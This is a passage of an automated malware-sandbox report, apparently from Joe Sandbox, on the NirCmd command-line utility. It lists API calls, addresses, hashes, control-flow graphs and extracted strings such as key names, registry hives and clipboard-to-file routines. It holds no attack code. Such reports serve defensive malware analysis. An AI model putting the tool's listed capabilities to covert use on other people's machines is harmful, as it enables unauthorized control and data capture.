                                                      • GetClipboardData.USER32(00000001), ref: 00402CC2
                                                      • GlobalFix.KERNEL32(00000000), ref: 00402CD1
                                                      • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000004,00000000,00000000), ref: 00402CF2
                                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00402CFF
                                                      • CloseHandle.KERNEL32(00000000), ref: 00402D33
                                                      • GlobalUnWire.KERNEL32(?), ref: 00402D43
                                                      • CloseClipboard.USER32 ref: 00402D4B
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ClipboardCloseFileGlobal$CreateDataHandlePointerWire
                                                      • String ID:
                                                      • API String ID: 582635635-0
                                                      • Opcode ID: c3d07eb3f0121942032efe0beabfea237d3eec54400d532cf1d9fb0a95195c19
                                                      • Instruction ID: a09e288ab0b32a3184ce5056086f2d8cef754a73dee96098910e7319272776ef
                                                      • Opcode Fuzzy Hash: c3d07eb3f0121942032efe0beabfea237d3eec54400d532cf1d9fb0a95195c19
                                                      • Instruction Fuzzy Hash: A0118C31500214BBDB241B62ED4EEDFBAB8EF85765F20812AFA01B51E0D7B95D418A68
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: atoi$CloseControlDeviceHandle
                                                      • String ID:
                                                      • API String ID: 489836140-0
                                                      • Opcode ID: a63ea7fd4cf7f3c21cf761553e5ced853428e291dba67f68912874378f4d0e48
                                                      • Instruction ID: e50192085bb800ac8454b05436a961e92824a757f454961b3fb52bd35b6eec38
                                                      • Opcode Fuzzy Hash: a63ea7fd4cf7f3c21cf761553e5ced853428e291dba67f68912874378f4d0e48
                                                      • Instruction Fuzzy Hash: 3901D4B1508388ABEF218F319C859DE3FA9EF05308F29401BFD2482263C775D549CB69
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(Userenv.dll), ref: 004044DD
                                                      • GetProcAddress.KERNEL32(00000000,CreateEnvironmentBlock), ref: 004044EE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc
                                                      • String ID: CreateEnvironmentBlock$Userenv.dll
                                                      • API String ID: 2574300362-1088060867
                                                      • Opcode ID: a4074be4403e1bd7847a76d3862526a2ae14e484a319b03aa2eca1f6c21475ff
                                                      • Instruction ID: 4415b242e8669d18c549caa52387758033a24d38cdb7f67173fde5cf0ed58fe3
                                                      • Opcode Fuzzy Hash: a4074be4403e1bd7847a76d3862526a2ae14e484a319b03aa2eca1f6c21475ff
                                                      • Instruction Fuzzy Hash: 5AE0ECB9A40300AFCB109FA1EC44B863BA5BF49791F01C436B606F25B0CBB6C590DF19
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileFindstrlen$FirstNext
                                                      • String ID:
                                                      • API String ID: 379999529-0
                                                      • Opcode ID: b5ed9bcbb160742e5535720eb4b7db3270fdd0b5fbfdeb788ae5e8f28fc89488
                                                      • Instruction ID: 66b1e65762c0f67a041298360b25bb8eea82fa3ecc386fe1376add757eaceb09
                                                      • Opcode Fuzzy Hash: b5ed9bcbb160742e5535720eb4b7db3270fdd0b5fbfdeb788ae5e8f28fc89488
                                                      • Instruction Fuzzy Hash: 2B11A072505204AED7109B38D845ADBB7DC9B08326F104A3FF059D61D1EB38AA409768
                                                      APIs
                                                        • Part of subcall function 004023AE: _mbscpy.MSVCRT ref: 004023B3
                                                        • Part of subcall function 004023AE: strrchr.MSVCRT ref: 004023BB
                                                      • FindFirstFileA.KERNEL32(?,?), ref: 004024E4
                                                        • Part of subcall function 00405E66: memset.MSVCRT ref: 00405E8C
                                                        • Part of subcall function 00405E66: strlen.MSVCRT ref: 00405EAF
                                                        • Part of subcall function 00405E66: strlen.MSVCRT ref: 00405EB9
                                                      • FindNextFileA.KERNEL32(00000000,?,?,?), ref: 00402513
                                                      • FindClose.KERNEL32(00000000,?,?), ref: 0040251E
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Find$Filestrlen$CloseFirstNext_mbscpymemsetstrrchr
                                                      • String ID:
                                                      • API String ID: 392549688-0
                                                      • Opcode ID: 727df42e2c638a7f21a27c3f3d28017d37e08afe7339e94c308f29071ead4a03
                                                      • Instruction ID: ae02e76aec1670720a5c2dd9c3f809d3bed691bca5f9a0a9f7d389f4a09935a0
                                                      • Opcode Fuzzy Hash: 727df42e2c638a7f21a27c3f3d28017d37e08afe7339e94c308f29071ead4a03
                                                      • Instruction Fuzzy Hash: FFF0F431510029BACF116B71DD489EE776CEB49354F044176EE19F21E0EB749A468A98
                                                      APIs
                                                      • PostQuitMessage.USER32(00000000), ref: 00405149
                                                      • PostQuitMessage.USER32(00000000), ref: 00405156
                                                      • NtdllDefWindowProc_A.NTDLL(?,00000113,?,?), ref: 00405162
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostQuit$NtdllProc_Window
                                                      • String ID:
                                                      • API String ID: 2354090847-0
                                                      • Opcode ID: 55734ea1980a04cf84c73b0ab8d520a3390b7dac91d289d95260b4e3ceb9bfe7
                                                      • Instruction ID: 682ead158df018a0c1c7df1a9b9d394980b371d4bf8790cc6e37d058107e5c85
                                                      • Opcode Fuzzy Hash: 55734ea1980a04cf84c73b0ab8d520a3390b7dac91d289d95260b4e3ceb9bfe7
                                                      • Instruction Fuzzy Hash: 91F08276A0051CB6DF215E45DC04B9F7B5AEB94322F058037F7082A1E0837849518F59
                                                      APIs
                                                      • GetVersionExA.KERNEL32(004162F0,00000104,00402439,004047E0,?,?,?,?,00000000,?), ref: 00402419
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Version
                                                      • String ID:
                                                      • API String ID: 1889659487-0
                                                      • Opcode ID: 9cb3674f5c80016f5824f001ce381a827ddc4253af2b099b1e7d6988ea96dcd6
                                                      • Instruction ID: 92d3335f98bebfad830288d8031abd2206dd3b4a267f8c4a93a33585ffed5fef
                                                      • Opcode Fuzzy Hash: 9cb3674f5c80016f5824f001ce381a827ddc4253af2b099b1e7d6988ea96dcd6
                                                      • Instruction Fuzzy Hash: 73C04C359122329BD7106B58BD1CBC5B698A759316F03C0FBA710A22A5C3FC8845CBDC

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 147 403c90-404155 148 40415b-40416a _strcmpi 147->148 149 40416c-404176 148->149 150 40417d-40417f 148->150 149->148 151 404178 149->151 152 40417a-40417c 150->152 151->152
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _strcmpi
                                                      • String ID: $!$"$#$$$%$&$'$($()A$)$*$+$,$-$.$/$0$1$11kHz16BitMono$11kHz16BitStereo$11kHz8BitMono$11kHz8BitStereo$12kHz16BitMono$12kHz16BitStereo$12kHz8BitMono$12kHz8BitStereo$16kHz16BitMono$16kHz16BitStereo$16kHz8BitMono$16kHz8BitStereo$2$22kHz16BitMono$22kHz16BitStereo$22kHz8BitMono$22kHz8BitStereo$24kHz16BitMono$24kHz16BitStereo$24kHz8BitMono$24kHz8BitStereo$3$32kHz16BitMono$32kHz16BitStereo$32kHz8BitMono$32kHz8BitStereo$4$44kHz16BitMono$44kHz16BitStereo$44kHz8BitMono$44kHz8BitStereo$48kHz16BitMono$48kHz16BitStereo$48kHz8BitMono$48kHz8BitStereo$5$6$7$8$8kHz16BitMono$8kHz16BitStereo$8kHz8BitMono$8kHz8BitStereo$9$:$;$<$=$>$?$@$A$ADPCM_11kHzMono$ADPCM_11kHzStereo$ADPCM_22kHzMono$ADPCM_22kHzStereo$ADPCM_44kHzMono$ADPCM_44kHzStereo$ADPCM_8kHzMono$ADPCM_8kHzStereo$B$C$CCITT_ALaw_11kHzMono$CCITT_ALaw_11kHzStereo$CCITT_ALaw_22kHzMono$CCITT_ALaw_22kHzStereo$CCITT_ALaw_44kHzMono$CCITT_ALaw_44kHzStereo$CCITT_ALaw_8kHzMono$CCITT_ALaw_8kHzStereo$CCITT_uLaw_11kHzMono$CCITT_uLaw_11kHzStereo$CCITT_uLaw_22kHzMono$CCITT_uLaw_22kHzStereo$CCITT_uLaw_44kHzMono$CCITT_uLaw_44kHzStereo$CCITT_uLaw_8kHzMono$CCITT_uLaw_8kHzStereo$D$GSM610_11kHzMono$GSM610_22kHzMono$GSM610_44kHzMono$GSM610_8kHzMono$TrueSpeech_8kHz1BitMono
                                                      • API String ID: 1439213657-1730997795
                                                      • Opcode ID: 9e1e4dfa34fd2f8dfec9beb8e39f38bb2e7052c6aced27dfa95cf0ab041b0218
                                                      • Instruction ID: 616cf5521d8ee30aacb67ca84064b6405153b8803ee37ae220bff35b5abb023f
                                                      • Opcode Fuzzy Hash: 9e1e4dfa34fd2f8dfec9beb8e39f38bb2e7052c6aced27dfa95cf0ab041b0218
                                                      • Instruction Fuzzy Hash: C4B13EB080126DDBEB65CF41DA587CDBAB4BB05348F5091CAC158BB281C7FA0AD9DF58

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 153 40678b-40679e strlen 154 4067a0-4067a6 153->154 155 4067ce-4067dd _strcmpi 153->155 156 4067b1-4067b7 154->156 157 4067a8-4067ac 154->157 158 4067e6-4067f5 _strcmpi 155->158 159 4067df-4067e1 155->159 156->157 161 4067b9-4067bf 156->161 160 406bf9 157->160 163 406801-406810 _strcmpi 158->163 164 4067f7-4067fc 158->164 162 406bce-406bcf 159->162 165 406bfc-406bff 160->165 161->155 166 4067c1-4067c9 161->166 162->165 167 406812-406817 163->167 168 40681c-40682b _strcmpi 163->168 164->165 166->160 167->165 169 406834-406843 _strcmpi 168->169 170 40682d-40682f 168->170 171 406845-40684a 169->171 172 40684f-40685e _strcmpi 169->172 170->162 171->165 173 406860-406865 172->173 174 40686a-406879 _strcmpi 172->174 173->165 175 406882-406891 _strcmpi 174->175 176 40687b-40687d 174->176 177 406893-406898 175->177 178 40689d-4068ac _strcmpi 175->178 176->162 177->165 179 4068b8-4068c7 _strcmpi 178->179 180 4068ae-4068b3 178->180 181 4068d0-4068df _strcmpi 179->181 182 4068c9-4068cb 179->182 180->165 183 4068e1-4068e3 181->183 184 4068e8-4068f7 _strcmpi 181->184 182->162 183->162 185 406900-40690f _strcmpi 184->185 186 4068f9-4068fb 184->186 187 406911-406913 185->187 188 406918-406927 _strcmpi 185->188 186->162 187->162 189 406930-40693f _strcmpi 188->189 190 406929-40692b 188->190 191 406941-406943 189->191 192 406948-406957 _strcmpi 189->192 190->162 191->162 193 406960-40696f _strcmpi 192->193 194 406959-40695b 192->194 195 406971-406973 193->195 196 406978-406987 _strcmpi 193->196 194->162 195->162 197 406990-40699f _strcmpi 196->197 198 406989-40698b 196->198 199 4069a1-4069a3 197->199 200 4069a8-4069b7 _strcmpi 197->200 198->162 199->162 201 4069c0-4069cf _strcmpi 200->201 202 4069b9-4069bb 200->202 203 4069d1-4069d6 201->203 204 4069db-4069ea _strcmpi 201->204 202->162 203->165 205 4069f6-406a05 _strcmpi 204->205 206 4069ec-4069f1 204->206 207 406a11-406a20 _strcmpi 205->207 208 406a07-406a0c 205->208 206->165 209 406a22-406a27 207->209 210 406a2c-406a3b _strcmpi 207->210 208->165 209->165 211 406a44-406a53 _strcmpi 210->211 212 406a3d-406a3f 210->212 213 406a55-406a57 211->213 214 406a5c-406a6b _strcmpi 211->214 212->162 213->162 215 406a74-406a83 _strcmpi 214->215 216 406a6d-406a6f 214->216 217 406a85-406a87 215->217 218 406a8c-406a9b _strcmpi 215->218 216->162 217->162 219 406aa4-406ab3 _strcmpi 218->219 220 406a9d-406a9f 218->220 221 406ab5-406ab7 219->221 222 406abc-406acb _strcmpi 219->222 220->162 221->162 223 406ad4-406ae3 _strcmpi 222->223 224 406acd-406acf 222->224 225 406ae5-406ae7 223->225 226 406aec-406afb _strcmpi 223->226 224->162 225->162 227 406b04-406b13 _strcmpi 226->227 228 406afd-406aff 226->228 229 406b15-406b17 227->229 230 406b1c-406b2b _strcmpi 227->230 228->162 229->162 231 406b34-406b43 _strcmpi 230->231 232 406b2d-406b2f 230->232 233 406b45-406b47 231->233 234 406b4c-406b5b _strcmpi 231->234 232->162 233->162 235 406b61-406b70 _strcmpi 234->235 236 406b5d-406b5f 234->236 237 406b72-406b74 235->237 238 406b76-406b85 _strcmpi 235->238 236->162 237->162 239 406b87-406b89 238->239 240 406b8b-406b9a _strcmpi 238->240 239->162 241 406ba3-406bb2 _strcmpi 240->241 242 406b9c-406ba1 240->242 243 406bb4-406bb9 241->243 244 406bbb-406bca _strcmpi 241->244 242->165 243->165 245 406bd1-406bd4 244->245 246 406bcc 244->246 247 406bd6-406bd9 245->247 248 406bdb-406bde 245->248 246->162 247->248 249 406be5-406bec call 40299d 247->249 250 406be0-406be3 248->250 251 406bee-406bf6 atoi 248->251 249->160 250->249 250->251 251->160
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _strcmpistrlen
                                                      • String ID: F$add$alt$apps$backspace$cancel$capslock$comma$ctrl$delete$divide$down$end$enter$esc$f$home$insert$left$leftctrl$leftmenu$leftshift$lwin$minus$multiply$numlock$pagedown$pageup$pause$period$plus$printscreen$right$rightctrl$rightmenu$rightshift$rwin$scroll$seperator$shift$spc$subtract$tab
                                                      • API String ID: 2953164535-3463197157
                                                      • Opcode ID: 5f9163372c2cd67b4887e5440dff314ad2c71145c07568a1450bc9be0d234a63
                                                      • Instruction ID: 6cf3061f4f1b4a3a8dc4e9dc4e2cf3cff59c93daa7677322c180900f4049563e
                                                      • Opcode Fuzzy Hash: 5f9163372c2cd67b4887e5440dff314ad2c71145c07568a1450bc9be0d234a63
                                                      • Instruction Fuzzy Hash: 19A13CB239D32968F91861212E12FEB1699CF51729F31103BF903F41C6FAEDA5B2505E

                                                      Control-flow Graph

                                                      APIs
                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401047
                                                      • GetDlgItem.USER32(?,000003EC), ref: 00401057
                                                      • ShellExecuteA.SHELL32(?,open,http://www.nirsoft.net,00411F27,00411F27,00000005), ref: 0040107B
                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401097
                                                      • GetDlgItem.USER32(?,000003EC), ref: 004010A7
                                                      • LoadCursorA.USER32(00000067), ref: 004010BD
                                                      • SetCursor.USER32(00000000,?,?), ref: 004010C4
                                                      • GetDlgItem.USER32(?,000003EC), ref: 004010D4
                                                      • SetBkMode.GDI32(?,00000001), ref: 004010E8
                                                      • SetTextColor.GDI32(?,00C00000), ref: 004010F6
                                                      • GetSysColorBrush.USER32(0000000F), ref: 004010FE
                                                      • EndDialog.USER32(?,00000001), ref: 00401124
                                                      • DeleteObject.GDI32 ref: 00401130
                                                      • MessageBoxA.USER32(00000000,?,NirCmd,00000024), ref: 00401177
                                                      • memset.MSVCRT ref: 00401195
                                                      • GetWindowsDirectoryA.KERNEL32(?,000000F0), ref: 004011A9
                                                      • _mbscat.MSVCRT ref: 004011C2
                                                      • CopyFileA.KERNEL32(?,?,00000000), ref: 004011E1
                                                      • MessageBoxA.USER32(00000000,Failed to copy NirCmd !,Error,00000030), ref: 004011F8
                                                      • SetWindowTextA.USER32(?,NirCmd), ref: 00401205
                                                      • SetDlgItemTextA.USER32(?,000003EA,NirCmd v2.86Copyright (c) 2003 - 2019 Nir SoferFor more information about using this utility, read the help file - nircmd.chm), ref: 0040121C
                                                      • SetDlgItemTextA.USER32(?,000003EC,http://www.nirsoft.net), ref: 0040122A
                                                      • GetDlgItem.USER32(?,000003EC), ref: 0040122E
                                                      • CreateFontIndirectA.GDI32(?), ref: 00401242
                                                      • SendMessageA.USER32(00000000,00000030,00000000,00000000), ref: 00401253
                                                      Strings
                                                      • If you copy NirCmd utility into your Windows directory, you'll be able to use NirCmd without specifying the full path of nircmd.exeDo you want to copy NirCmd into your Windows directory ?, xrefs: 00401162
                                                      • nircmd.exe, xrefs: 004011BC
                                                      • NirCmd, xrefs: 00401157, 004011FF
                                                      • http://www.nirsoft.net, xrefs: 0040106E, 0040121E
                                                      • Error, xrefs: 004011ED
                                                      • Failed to copy NirCmd !, xrefs: 004011F2
                                                      • NirCmd v2.86Copyright (c) 2003 - 2019 Nir SoferFor more information about using this utility, read the help file - nircmd.chm, xrefs: 00401211
                                                      • open, xrefs: 00401073
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Item$Text$MessageWindow$ChildColorCursorFromPoint$BrushCopyCreateDeleteDialogDirectoryExecuteFileFontIndirectLoadModeObjectSendShellWindows_mbscatmemset
                                                      • String ID: Error$Failed to copy NirCmd !$If you copy NirCmd utility into your Windows directory, you'll be able to use NirCmd without specifying the full path of nircmd.exeDo you want to copy NirCmd into your Windows directory ?$NirCmd$NirCmd v2.86Copyright (c) 2003 - 2019 Nir SoferFor more information about using this utility, read the help file - nircmd.chm$http://www.nirsoft.net$nircmd.exe$open
                                                      • API String ID: 1344801783-3588370389
                                                      • Opcode ID: aa90009937ac5df87c0ef0c6345ba922f25f1f4f4ca8a1b08f17dbaf6ca29328
                                                      • Instruction ID: 95ce644df71112e4f5bf93e31658e12353af846712ee8fbfaa71453a5b9172e1
                                                      • Opcode Fuzzy Hash: aa90009937ac5df87c0ef0c6345ba922f25f1f4f4ca8a1b08f17dbaf6ca29328
                                                      • Instruction Fuzzy Hash: A1519C75A00209BBDB20AB60DC49FDF3A68EB08781F008576FB05F61F1D7B899819A5C

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 403 40e6e6-40e707 call 402627 406 40e8b6 403->406 407 40e70d-40e741 memset memcpy strlen 403->407 408 40e8b8-40e8bb 406->408 409 40e7b3-40e7c5 _strcmpi 407->409 410 40e743-40e756 strcmp 407->410 411 40e8a7 409->411 412 40e7cb-40e7dd _strcmpi 409->412 413 40e797-40e7a6 strcmp 410->413 414 40e758-40e77e GetCurrentProcess GetModuleHandleA GetProcAddress 410->414 417 40e8ac-40e8b4 411->417 412->411 419 40e7e3-40e7f5 _strcmpi 412->419 413->409 418 40e7a8-40e7ad 413->418 415 40e780-40e784 414->415 416 40e787-40e78a 414->416 415->416 416->409 420 40e78c-40e795 416->420 417->408 418->409 421 40e8a0-40e8a5 419->421 422 40e7fb-40e80d _strcmpi 419->422 420->409 421->417 422->421 423 40e813-40e825 _strcmpi 422->423 424 40e827-40e839 _strcmpi 423->424 425 40e899-40e89e 423->425 424->425 426 40e83b-40e84d _strcmpi 424->426 425->417 427 40e892-40e897 426->427 428 40e84f-40e861 _strcmpi 426->428 427->417 428->427 429 40e863-40e875 _strcmpi 428->429 430 40e877-40e889 _strcmpi 429->430 431 40e88b-40e890 429->431 430->406 430->431 431->417
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _strcmpi$strcmp$AddressCurrentHandleModuleProcProcessmemcpymemsetstrlen
                                                      • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU$IsWow64Process$kernel32
                                                      • API String ID: 2692079152-2266215105
                                                      • Opcode ID: e7f9481005193b3c4d9d90531baf4d568eaacbeddf083df3c70b55d6b8b21bf3
                                                      • Instruction ID: a494c5e7f13fc44ae11766599c5c470138668bcdfce26567549bf84b3d492a57
                                                      • Opcode Fuzzy Hash: e7f9481005193b3c4d9d90531baf4d568eaacbeddf083df3c70b55d6b8b21bf3
                                                      • Instruction Fuzzy Hash: B8516472A483086EFB14EAE29941ADE7BAC9F44314F24482FFA10E71C1EA7CD595865C

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 432 404d14-404d41 memset 433 404d44-404d5f call 402627 432->433 436 404d61-404d78 memcpy 433->436 437 404d7a-404d83 _mbscpy 433->437 438 404d8a-404d9f _strcmpi 436->438 437->438 439 404da1-404da8 438->439 440 404dad-404dc2 _strcmpi 438->440 441 404f38-404f3c 439->441 442 404dd0-404de5 _strcmpi 440->442 443 404dc4-404dcb 440->443 441->433 446 404f42-404f4a 441->446 444 404df3-404e08 _strcmpi 442->444 445 404de7-404dee 442->445 443->441 447 404e16-404e2b _strcmpi 444->447 448 404e0a-404e11 444->448 445->441 449 404e36-404e4b _strcmpi 447->449 450 404e2d-404e31 447->450 448->441 451 404e56-404e6b _strcmpi 449->451 452 404e4d-404e51 449->452 450->441 453 404e76-404e8b _strcmpi 451->453 454 404e6d-404e71 451->454 452->441 455 404e96-404eab _strcmpi 453->455 456 404e8d-404e91 453->456 454->441 457 404eb6-404ecb _strcmpi 455->457 458 404ead-404eb1 455->458 456->441 459 404ed3-404ee8 _strcmpi 457->459 460 404ecd-404ed1 457->460 458->441 461 404ef0-404ef7 459->461 462 404eea-404eee 459->462 460->441 463 404f02-404f0c 461->463 464 404ef9-404f00 461->464 462->441 465 404f23-404f2a 463->465 466 404f0e-404f21 atoi 463->466 464->463 464->465 465->441 467 404f2c-404f34 465->467 466->441 467->441
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _strcmpi$_mbscpymemcpymemset
                                                      • String ID: .$F$alt$ctrl$del$enter$esc$ext$ins$plus$shift$spc$tab
                                                      • API String ID: 2491115275-2319011969
                                                      • Opcode ID: 2bd1bbcd66995d93a670adfe874cbc0423678e83b78ef91b29bc97a9acfa463d
